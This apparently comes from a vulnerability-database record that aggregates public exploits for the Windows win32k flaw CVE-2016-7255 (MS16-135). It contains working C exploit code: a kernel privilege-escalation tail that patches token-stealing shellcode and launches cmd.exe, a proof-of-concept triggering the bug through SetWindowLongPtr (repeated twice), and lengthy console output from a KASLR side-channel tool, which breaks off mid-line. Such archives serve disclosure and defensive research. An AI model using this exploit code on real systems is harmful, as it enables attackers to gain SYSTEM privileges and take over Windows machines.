\nprintf(\"[*] Self Ref Index: %x\\n\", PML4_SELF_REF_INDEX); \nPML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000); \n \nUINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset); \n \nprintf(\"Original OverwriteTarget pointer: %llx\\n\", original_pointer); \nDWORD pid = GetCurrentProcessId(); \n \n/* Shellcode Patching !! */ \nchar *p = shellcode; \np += 4; // skip the CLI, PUSHF and MOV RAX bytes \n*(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1 \n \np += 12; // Patch shellcode with original value in the Overwrite address \n*(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset); \n \np += 12; // To patch the PID of our process \n \n*(DWORD *)p = (DWORD)pid; \n \np += 17; \n*(unsigned char *)p = (unsigned char)sc_KPROCESS; \n \np += 7; \n*(unsigned int *)p = (unsigned int)sc_APLINKS; \n \np += 20; \n*(unsigned int *)p = (unsigned int)sc_TOKEN; \n \np += 20; \n*(unsigned int *)p = (unsigned int)sc_TOKEN; \n \nUINT64 shellcode_va = store_shellcode_in_hal(); \nprintf(\"[+] w00t: Shellcode stored at: %llx\\n\", shellcode_va); \noverwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset); \n \nif (osversion == 7){ \n// Exploit Win7.1 \nhNtDll = LoadLibrary(\"ntdll.dll\"); \n \nif (!hNtDll) { \nprintf(\"\\t\\t[-] Failed loading NtDll: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \nNtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, \"NtQueryIntervalProfile\"); \n \nif (!NtQueryIntervalProfile) { \nprintf(\"\\t\\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \nNtQueryIntervalProfile(0x1337, &Interval); \n} \n \n \nwhile (1) { \nsize = 256; \nGetUserName(post_username, &size); \nif (memcmp(post_username, pre_username, 256) != 0) break; \n} \nSleep(2000); \nsystem(\"cmd.exe\"); \n \n \nreturn 0; \n} \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/140468/ms16135-escalate.txt"}, {"lastseen": "2016-12-05T22:16:40", "description": "", "published": "2016-11-14T00:00:00", "type": "packetstorm", "title": "Microsoft Windows kernel win32k Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2016-11-14T00:00:00", "id": "PACKETSTORM:139701", "href": "https://packetstormsecurity.com/files/139701/Microsoft-Windows-kernel-win32k-Denial-Of-Service.html", "sourceData": "`/* \nSource: https://github.com/tinysec/public/tree/master/CVE-2016-7255 \n \nFull Proof of Concept: \n \nhttps://github.com/tinysec/public/tree/master/CVE-2016-7255 \nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40745.zip \n \n******************************************************************** \nCreated: 2016-11-09 14:23:09 \nFilename: main.c \nAuthor: root[at]TinySec.net \nVersion 0.0.0.1 \nPurpose: poc of cve-2016-0075 \n********************************************************************* \n*/ \n \n#include <windows.h> \n#include <wchar.h> \n#include <stdlib.h> \n#include <stdio.h> \n \n \n////////////////////////////////////////////////////////////////////////// \n#pragma comment(lib,\"ntdll.lib\") \n#pragma comment(lib,\"user32.lib\") \n \n#undef DbgPrint \nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... ); \nULONG __cdecl DbgPrint(__in char* Format, ...) \n{ \nCHAR* pszDbgBuff = NULL; \nva_list VaList=NULL; \nULONG ulRet = 0; \n \ndo \n{ \npszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR)); \nif (NULL == pszDbgBuff) \n{ \nbreak; \n} \nRtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR)); \n \nva_start(VaList,Format); \n \n_vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList); \n \nDbgPrintEx(77 , 0 , pszDbgBuff ); \nOutputDebugStringA(pszDbgBuff); \n \nva_end(VaList); \n \n} while (FALSE); \n \nif (NULL != pszDbgBuff) \n{ \nHeapFree( GetProcessHeap(), 0 , pszDbgBuff ); \npszDbgBuff = NULL; \n} \n \nreturn ulRet; \n} \n \n \nint _sim_key_down(WORD wKey) \n{ \nINPUT stInput = {0}; \n \ndo \n{ \nstInput.type = INPUT_KEYBOARD; \nstInput.ki.wVk = wKey; \nstInput.ki.dwFlags = 0; \n \nSendInput(1 , &stInput , sizeof(stInput) ); \n \n} while (FALSE); \n \nreturn 0; \n} \n \nint _sim_key_up(WORD wKey) \n{ \nINPUT stInput = {0}; \n \ndo \n{ \nstInput.type = INPUT_KEYBOARD; \nstInput.ki.wVk = wKey; \nstInput.ki.dwFlags = KEYEVENTF_KEYUP; \n \nSendInput(1 , &stInput , sizeof(stInput) ); \n \n} while (FALSE); \n \nreturn 0; \n} \n \nint _sim_alt_shift_esc() \n{ \nint i = 0; \n \ndo \n{ \n_sim_key_down( VK_MENU ); \n_sim_key_down( VK_SHIFT ); \n \n \n_sim_key_down( VK_ESCAPE); \n_sim_key_up( VK_ESCAPE); \n \n_sim_key_down( VK_ESCAPE); \n_sim_key_up( VK_ESCAPE); \n \n_sim_key_up( VK_MENU ); \n_sim_key_up( VK_SHIFT ); \n \n \n} while (FALSE); \n \nreturn 0; \n} \n \n \n \nint _sim_alt_shift_tab(int nCount) \n{ \nint i = 0; \nHWND hWnd = NULL; \n \n \nint nFinalRet = -1; \n \ndo \n{ \n_sim_key_down( VK_MENU ); \n_sim_key_down( VK_SHIFT ); \n \n \nfor ( i = 0; i < nCount ; i++) \n{ \n_sim_key_down( VK_TAB); \n_sim_key_up( VK_TAB); \n \nSleep(1000); \n \n} \n \n \n_sim_key_up( VK_MENU ); \n_sim_key_up( VK_SHIFT ); \n} while (FALSE); \n \nreturn nFinalRet; \n} \n \n \n \nint or_address_value_4(__in void* pAddress) \n{ \nWNDCLASSEXW stWC = {0}; \n \nHWND hWndParent = NULL; \nHWND hWndChild = NULL; \n \nWCHAR* pszClassName = L\"cve-2016-7255\"; \nWCHAR* pszTitleName = L\"cve-2016-7255\"; \n \nvoid* pId = NULL; \nMSG stMsg = {0}; \n \ndo \n{ \n \nstWC.cbSize = sizeof(stWC); \nstWC.lpfnWndProc = DefWindowProcW; \nstWC.lpszClassName = pszClassName; \n \nif ( 0 == RegisterClassExW(&stWC) ) \n{ \nbreak; \n} \n \nhWndParent = CreateWindowExW( \n0, \npszClassName, \nNULL, \nWS_OVERLAPPEDWINDOW|WS_VISIBLE, \n0, \n0, \n360, \n360, \nNULL, \nNULL, \nGetModuleHandleW(NULL), \nNULL \n); \n \nif (NULL == hWndParent) \n{ \nbreak; \n} \n \nhWndChild = CreateWindowExW( \n0, \npszClassName, \npszTitleName, \nWS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD, \n0, \n0, \n160, \n160, \nhWndParent, \nNULL, \nGetModuleHandleW(NULL), \nNULL \n); \n \nif (NULL == hWndChild) \n{ \nbreak; \n} \n \n#ifdef _WIN64 \npId = ( (UCHAR*)pAddress - 0x28 ); \n#else \npId = ( (UCHAR*)pAddress - 0x14); \n#endif // #ifdef _WIN64 \n \nSetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId ); \n \nDbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild); \nDebugBreak(); \n \nShowWindow(hWndParent , SW_SHOWNORMAL); \n \nSetParent(hWndChild , GetDesktopWindow() ); \n \nSetForegroundWindow(hWndChild); \n \n_sim_alt_shift_tab(4); \n \nSwitchToThisWindow(hWndChild , TRUE); \n \n_sim_alt_shift_esc(); \n \n \nwhile( GetMessage(&stMsg , NULL , 0 , 0) ) \n{ \nTranslateMessage(&stMsg); \nDispatchMessage(&stMsg); \n} \n \n \n} while (FALSE); \n \nif ( NULL != hWndParent ) \n{ \nDestroyWindow(hWndParent); \nhWndParent = NULL; \n} \n \nif ( NULL != hWndChild ) \n{ \nDestroyWindow(hWndChild); \nhWndChild = NULL; \n} \n \nUnregisterClassW(pszClassName , GetModuleHandleW(NULL) ); \n \nreturn 0; \n} \n \nint __cdecl wmain(int nArgc, WCHAR** Argv) \n{ \ndo \n{ \nor_address_value_4( (void*)0xFFFFFFFF ); \n} while (FALSE); \n \nreturn 0; \n} \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139701/ms16135-dos.txt"}], "zdt": [{"lastseen": "2018-01-03T09:00:04", "description": "Exploit for windows platform in category dos / poc", "edition": 1, "published": "2016-11-10T00:00:00", "type": "zdt", "title": "Microsoft Windows Kernel - win32k Denial of Service (MS16-135) Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2016-11-10T00:00:00", "href": "https://0day.today/exploit/description/26297", "id": "1337DAY-ID-26297", "sourceData": "/*\r\nSource: https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n \r\nFull Proof of Concept:\r\n \r\nhttps://github.com/tinysec/public/tree/master/CVE-2016-7255\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40745.zip\r\n \r\n********************************************************************\r\n Created: 2016-11-09 14:23:09\r\n Filename: main.c\r\n Author: root[at]TinySec.net\r\n Version 0.0.0.1\r\n Purpose: poc of cve-2016-0075\r\n*********************************************************************\r\n*/\r\n \r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n \r\n \r\n//////////////////////////////////////////////////////////////////////////\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n \r\n#undef DbgPrint\r\nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );\r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n CHAR* pszDbgBuff = NULL;\r\n va_list VaList=NULL;\r\n ULONG ulRet = 0;\r\n \r\n do\r\n {\r\n pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));\r\n if (NULL == pszDbgBuff)\r\n {\r\n break;\r\n }\r\n RtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));\r\n \r\n va_start(VaList,Format);\r\n \r\n _vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);\r\n \r\n DbgPrintEx(77 , 0 , pszDbgBuff );\r\n OutputDebugStringA(pszDbgBuff);\r\n \r\n va_end(VaList);\r\n \r\n } while (FALSE);\r\n \r\n if (NULL != pszDbgBuff)\r\n {\r\n HeapFree( GetProcessHeap(), 0 , pszDbgBuff );\r\n pszDbgBuff = NULL;\r\n }\r\n \r\n return ulRet;\r\n}\r\n \r\n \r\n int _sim_key_down(WORD wKey)\r\n {\r\n INPUT stInput = {0};\r\n \r\n do\r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = 0;\r\n \r\n SendInput(1 , &stInput , sizeof(stInput) );\r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\n int _sim_key_up(WORD wKey)\r\n {\r\n INPUT stInput = {0};\r\n \r\n do\r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n \r\n SendInput(1 , &stInput , sizeof(stInput) );\r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\n int _sim_alt_shift_esc()\r\n {\r\n int i = 0;\r\n \r\n do\r\n {\r\n _sim_key_down( VK_MENU );\r\n _sim_key_down( VK_SHIFT ); \r\n \r\n \r\n _sim_key_down( VK_ESCAPE);\r\n _sim_key_up( VK_ESCAPE);\r\n \r\n _sim_key_down( VK_ESCAPE);\r\n _sim_key_up( VK_ESCAPE);\r\n \r\n _sim_key_up( VK_MENU );\r\n _sim_key_up( VK_SHIFT ); \r\n \r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\n \r\n \r\n int _sim_alt_shift_tab(int nCount)\r\n {\r\n int i = 0;\r\n HWND hWnd = NULL;\r\n \r\n \r\n int nFinalRet = -1;\r\n \r\n do\r\n {\r\n _sim_key_down( VK_MENU );\r\n _sim_key_down( VK_SHIFT ); \r\n \r\n \r\n for ( i = 0; i < nCount ; i++)\r\n {\r\n _sim_key_down( VK_TAB);\r\n _sim_key_up( VK_TAB);\r\n \r\n Sleep(1000);\r\n \r\n }\r\n \r\n \r\n _sim_key_up( VK_MENU );\r\n _sim_key_up( VK_SHIFT ); \r\n } while (FALSE);\r\n \r\n return nFinalRet;\r\n}\r\n \r\n \r\n \r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n WNDCLASSEXW stWC = {0};\r\n \r\n HWND hWndParent = NULL;\r\n HWND hWndChild = NULL;\r\n \r\n WCHAR* pszClassName = L\"cve-2016-7255\";\r\n WCHAR* pszTitleName = L\"cve-2016-7255\";\r\n \r\n void* pId = NULL;\r\n MSG stMsg = {0};\r\n \r\n do\r\n {\r\n \r\n stWC.cbSize = sizeof(stWC);\r\n stWC.lpfnWndProc = DefWindowProcW;\r\n stWC.lpszClassName = pszClassName;\r\n \r\n if ( 0 == RegisterClassExW(&stWC) )\r\n {\r\n break;\r\n }\r\n \r\n hWndParent = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n NULL,\r\n WS_OVERLAPPEDWINDOW|WS_VISIBLE,\r\n 0,\r\n 0,\r\n 360,\r\n 360,\r\n NULL,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n \r\n if (NULL == hWndParent)\r\n {\r\n break;\r\n }\r\n \r\n hWndChild = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n pszTitleName,\r\n WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,\r\n 0,\r\n 0,\r\n 160,\r\n 160,\r\n hWndParent,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n \r\n if (NULL == hWndChild)\r\n {\r\n break;\r\n }\r\n \r\n #ifdef _WIN64\r\n pId = ( (UCHAR*)pAddress - 0x28 ); \r\n #else\r\n pId = ( (UCHAR*)pAddress - 0x14); \r\n #endif // #ifdef _WIN64\r\n \r\n SetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );\r\n \r\n DbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild);\r\n DebugBreak();\r\n \r\n ShowWindow(hWndParent , SW_SHOWNORMAL);\r\n \r\n SetParent(hWndChild , GetDesktopWindow() );\r\n \r\n SetForegroundWindow(hWndChild);\r\n \r\n _sim_alt_shift_tab(4);\r\n \r\n SwitchToThisWindow(hWndChild , TRUE);\r\n \r\n _sim_alt_shift_esc();\r\n \r\n \r\n while( GetMessage(&stMsg , NULL , 0 , 0) )\r\n { \r\n TranslateMessage(&stMsg);\r\n DispatchMessage(&stMsg);\r\n }\r\n \r\n \r\n } while (FALSE);\r\n \r\n if ( NULL != hWndParent )\r\n {\r\n DestroyWindow(hWndParent);\r\n hWndParent = NULL;\r\n }\r\n \r\n if ( NULL != hWndChild )\r\n {\r\n DestroyWindow(hWndChild);\r\n hWndChild = NULL;\r\n }\r\n \r\n UnregisterClassW(pszClassName , GetModuleHandleW(NULL) );\r\n \r\n return 0;\r\n}\r\n \r\nint __cdecl wmain(int nArgc, WCHAR** Argv)\r\n{\r\n do\r\n {\r\n or_address_value_4( (void*)0xFFFFFFFF );\r\n } while (FALSE);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/26297", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-18T17:25:55", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2016-11-24T00:00:00", "type": "zdt", "title": "Microsoft Windows Kernel win32k.sys - 'NtSetWindowLongPtr' Privilege Escalation (MS16-13", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2016-11-24T00:00:00", "href": "https://0day.today/exploit/description/26414", "id": "1337DAY-ID-26414", "sourceData": "Complete Proof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40823.zip\r\n \r\nI Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016\r\n \r\nRequirements\r\n \r\nIntel Processor (Haswell or newer)\r\nWindows 10 x64\r\nUsage\r\n \r\nRun ASLRSideChannelAttack.exe to get the PML4-Self-Ref entry:\r\n \r\nC:\\Users\\qa\\Desktop>ASLRSideChannelAttack.exe\r\n+] Setting thread affinity to CPU 0\r\n+] Getting all the potential PML4 SelfRef\r\n+] Mapping a page oracle\r\n+] Allocating probing target pages...\r\nAllocation 0: 0000020E339D0000\r\nAllocation 1: 0000020E339E0000\r\nAllocation 2: 0000020E339F0000\r\nAllocation 3: 0000020E33A00000\r\nAllocation 4: 0000020E33A10000\r\n--------------------------\r\n+] Check that Unammped and Mapped values are consistent across several executions!\r\n--------------------------\r\nUnmapped Initial: 256.683746\r\nMapped Initial: 203.692978\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 247.440018\r\nMapped: 202.827560\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF8140A0502810\r\n+] PTE FFFF81010719CE80 looks mapped! - Time: 207.127213\r\n+] PTE FFFF81010719CF00 looks mapped! - Time: 195.239563\r\n+] PTE FFFF81010719CF80 looks mapped! - Time: 192.401382\r\n+] PTE FFFF81010719D000 looks mapped! - Time: 197.297256\r\n+] PTE FFFF81010719D080 looks mapped! - Time: 194.501175\r\n+] PTE FFFF810804020100 looks mapped! - Time: 204.740097\r\n+] Removing 102 from initial array and pushing it into final array\r\nPotential SelfRef: FFFF81C0E0703818\r\n+] PTE FFFF81810719CE80 looks mapped! - Time: 200.837616\r\n+] PTE FFFF81810719CF00 looks mapped! - Time: 207.868774\r\n+] PTE FFFF81810719CF80 looks mapped! - Time: 208.949921\r\n+] PTE FFFF81810719D000 looks mapped! - Time: 202.525726\r\n+] PTE FFFF81810719D080 looks mapped! - Time: 208.673874\r\nTime difference exceed for ffff818804020100, retrying...\r\n+] PTE FFFF818804020100 looks mapped! - Time: 209.071213\r\n+] Removing 103 from initial array and pushing it into final array\r\nTime difference exceed for ffff824120904820, retrying...\r\nPotential SelfRef: FFFF824120904820\r\n+] PTE FFFF82010719CE80 looks mapped! - Time: 198.373642\r\nTime difference exceed for ffff82010719cf00, retrying...\r\n+] PTE FFFF82010719CF00 looks mapped! - Time: 206.213593\r\n+] PTE FFFF82010719CF80 looks mapped! - Time: 210.637344\r\n+] PTE FFFF82010719D000 looks mapped! - Time: 207.820862\r\n+] PTE FFFF82010719D080 looks mapped! - Time: 197.229263\r\n+] PTE FFFF820804020100 looks mapped! - Time: 204.585739\r\n+] Removing 104 from initial array and pushing it into final array\r\nPotential SelfRef: FFFF82C160B05828\r\n+] PTE FFFF82810719CE80 looks mapped! - Time: 216.981003\r\nTime difference exceed for ffff8341a0d06830, retrying...\r\nPotential SelfRef: FFFF8341A0D06830\r\n+] PTE FFFF83010719CE80 looks mapped! - Time: 201.957657\r\n+] PTE FFFF83010719CF00 looks mapped! - Time: 202.023697\r\n+] PTE FFFF83010719CF80 looks mapped! - Time: 212.651016\r\n+] PTE FFFF83010719D000 looks mapped! - Time: 214.013504\r\n+] PTE FFFF83010719D080 looks mapped! - Time: 191.688126\r\n+] PTE FFFF830804020100 looks mapped! - Time: 193.314758\r\n+] Removing 106 from initial array and pushing it into final array\r\nPotential SelfRef: FFFF83C1E0F07838\r\n+] PTE FFFF83810719CE80 looks mapped! - Time: 195.506973\r\n+] PTE FFFF83810719CF00 looks mapped! - Time: 193.697693\r\n+] PTE FFFF83810719CF80 looks mapped! - Time: 208.809097\r\n+] PTE FFFF83810719D000 looks mapped! - Time: 216.298660\r\n+] PTE FFFF83810719D080 looks mapped! - Time: 203.848816\r\n+] PTE FFFF838804020100 looks mapped! - Time: 204.008743\r\n+] Removing 107 from initial array and pushing it into final array\r\nTime difference exceed for ffff89c4e2713898, retrying...\r\nTime difference exceed for ffff8bc5e2f178b8, retrying...\r\nTime difference exceed for ffff8c46231188c0, retrying...\r\nUnmapped Initial: 248.508636\r\nMapped Initial: 207.139847\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 236.360733\r\nMapped: 195.650040\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF8140A0502810\r\n+] PTE FFFF81010719CE80 looks mapped! - Time: 197.312363\r\nPotential SelfRef: FFFF81C0E0703818\r\nTime difference exceed for ffff81810719ce80, retrying...\r\nTime difference exceed for ffff81810719ce80, retrying...\r\nTime difference exceed for ffff81810719ce80, retrying...\r\nTime difference exceed for ffff81810719ce80, retrying...\r\n+] PTE FFFF81810719CE80 looks mapped! - Time: 209.812393\r\nTime difference exceed for ffff81810719cf00, retrying...\r\n+] PTE FFFF81810719CF00 looks mapped! - Time: 207.951645\r\n+] PTE FFFF81810719CF80 looks mapped! - Time: 200.001724\r\n+] PTE FFFF81810719D000 looks mapped! - Time: 197.655167\r\n+] PTE FFFF81810719D080 looks mapped! - Time: 201.667160\r\n+] PTE FFFF818804020100 looks mapped! - Time: 195.728439\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF81C0E0703818 - Index: 103\r\nPML4e: FFFF824120904820 - Index: 104\r\nPML4e: FFFF8341A0D06830 - Index: 106\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff818000000000\r\n-] Erasing 103 from final array\r\nPotential SelfRef: FFFF824120904820\r\n+] PTE FFFF82010719CE80 looks mapped! - Time: 206.883759\r\n+] PTE FFFF82010719CF00 looks mapped! - Time: 208.451019\r\n+] PTE FFFF82010719CF80 looks mapped! - Time: 201.073364\r\n+] PTE FFFF82010719D000 looks mapped! - Time: 203.052826\r\n+] PTE FFFF82010719D080 looks mapped! - Time: 194.115143\r\n+] PTE FFFF820804020100 looks mapped! - Time: 198.158585\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF824120904820 - Index: 104\r\nPML4e: FFFF8341A0D06830 - Index: 106\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff820000000000\r\n-] Erasing 104 from final array\r\nPotential SelfRef: FFFF8341A0D06830\r\n+] PTE FFFF83010719CE80 looks mapped! - Time: 200.405823\r\n+] PTE FFFF83010719CF00 looks mapped! - Time: 201.572525\r\n+] PTE FFFF83010719CF80 looks mapped! - Time: 193.538040\r\n+] PTE FFFF83010719D000 looks mapped! - Time: 196.066254\r\n+] PTE FFFF83010719D080 looks mapped! - Time: 189.007034\r\n+] PTE FFFF830804020100 looks mapped! - Time: 197.613953\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF8341A0D06830 - Index: 106\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff830000000000\r\n-] Erasing 106 from final array\r\nPotential SelfRef: FFFF83C1E0F07838\r\n+] PTE FFFF83810719CE80 looks mapped! - Time: 200.655380\r\nTime difference exceed for ffff83810719cf00, retrying...\r\nTime difference exceed for ffff83810719cf00, retrying...\r\nUnmapped Initial: 232.123840\r\nMapped Initial: 196.420654\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 234.845581\r\nMapped: 187.862518\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF8140A0502810\r\n+] PTE FFFF81010719CE80 looks mapped! - Time: 197.432938\r\n+] PTE FFFF81010719CF00 looks mapped! - Time: 191.731766\r\nTime difference exceed for ffff81010719cf80, retrying...\r\nTime difference exceed for ffff81010719cf80, retrying...\r\nTime difference exceed for ffff81010719cf80, retrying...\r\n+] PTE FFFF81010719CF80 looks mapped! - Time: 201.003784\r\n+] PTE FFFF81010719D000 looks mapped! - Time: 194.332733\r\n+] PTE FFFF81010719D080 looks mapped! - Time: 200.211182\r\n+] PTE FFFF810804020100 looks mapped! - Time: 199.812225\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff810000000000\r\nTime difference exceed for ffff810000000000, retrying...\r\n-] Erasing 102 from final array\r\nTime difference exceed for ffff83c1e0f07838, retrying...\r\nPotential SelfRef: FFFF83C1E0F07838\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nUnmapped Initial: 230.247162\r\nMapped Initial: 198.023987\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 235.923035\r\nMapped: 191.605301\r\n--------------------------\r\n \r\nTime difference exceed for ffff83c1e0f07838, retrying...\r\nTime difference exceed for ffff83c1e0f07838, retrying...\r\nPotential SelfRef: FFFF83C1E0F07838\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nUnmapped Initial: 258.041046\r\nMapped Initial: 210.309753\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 238.757538\r\nMapped: 203.896240\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF83C1E0F07838\r\n+] PTE FFFF83810719CE80 looks mapped! - Time: 210.036102\r\n+] PTE FFFF83810719CF00 looks mapped! - Time: 199.200836\r\n+] PTE FFFF83810719CF80 looks mapped! - Time: 204.575333\r\n+] PTE FFFF83810719D000 looks mapped! - Time: 197.218445\r\n+] PTE FFFF83810719D080 looks mapped! - Time: 203.334763\r\n+] PTE FFFF838804020100 looks mapped! - Time: 203.243607\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff838000000000\r\n-] Erasing 107 from final array\r\nPotential SelfRef: FFFF82C160B05828\r\n+] PTE FFFF82810719CE80 looks mapped! - Time: 201.889221\r\n+] PTE FFFF82810719CF00 looks mapped! - Time: 201.679138\r\n+] PTE FFFF82810719CF80 looks mapped! - Time: 204.281006\r\n+] PTE FFFF82810719D000 looks mapped! - Time: 209.909943\r\n+] PTE FFFF82810719D080 looks mapped! - Time: 202.795639\r\n+] PTE FFFF828804020100 looks mapped! - Time: 196.754044\r\n+] Removing 105 from initial array and pushing it into final array\r\nTime difference exceed for ffff884422110880, retrying...\r\nTime difference exceed for ffff884422110880, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff90c864321908, retrying...\r\nUnmapped Initial: 257.754272\r\nMapped Initial: 207.903702\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 247.145935\r\nMapped: 207.792923\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF82C160B05828\r\n+] PTE FFFF82810719CE80 looks mapped! - Time: 208.554092\r\n+] PTE FFFF82810719CF00 looks mapped! - Time: 206.517715\r\n+] PTE FFFF82810719CF80 looks mapped! - Time: 216.576614\r\n+] PTE FFFF82810719D000 looks mapped! - Time: 213.698837\r\n+] PTE FFFF82810719D080 looks mapped! - Time: 210.162796\r\n+] PTE FFFF828804020100 looks mapped! - Time: 208.765045\r\nPML4e: FFFF82C160B05828 - Index: 105\r\nKNOWN_UNMAPPED PTE: ffff828000000000\r\n-] Erasing 105 from final array\r\n-] Removing 100 as it seems to be unmapped\r\n-] Removing 101 as it seems to be unmapped\r\n-] Removing 108 as it seems to be unmapped\r\n-] Removing 109 as it seems to be unmapped\r\n-] Removing 10a as it seems to be unmapped\r\n-] Removing 10b as it seems to be unmapped\r\n-] Removing 10c as it seems to be unmapped\r\n-] Removing 10d as it seems to be unmapped\r\nTime difference exceed for ffff8743a1d0e870, retrying...\r\n-] Removing 10e as it seems to be unmapped\r\n-] Removing 10f as it seems to be unmapped\r\n-] Removing 110 as it seems to be unmapped\r\nTime difference exceed for ffff88c462311888, retrying...\r\n-] Removing 111 as it seems to be unmapped\r\n-] Removing 112 as it seems to be unmapped\r\n-] Removing 113 as it seems to be unmapped\r\nTime difference exceed for 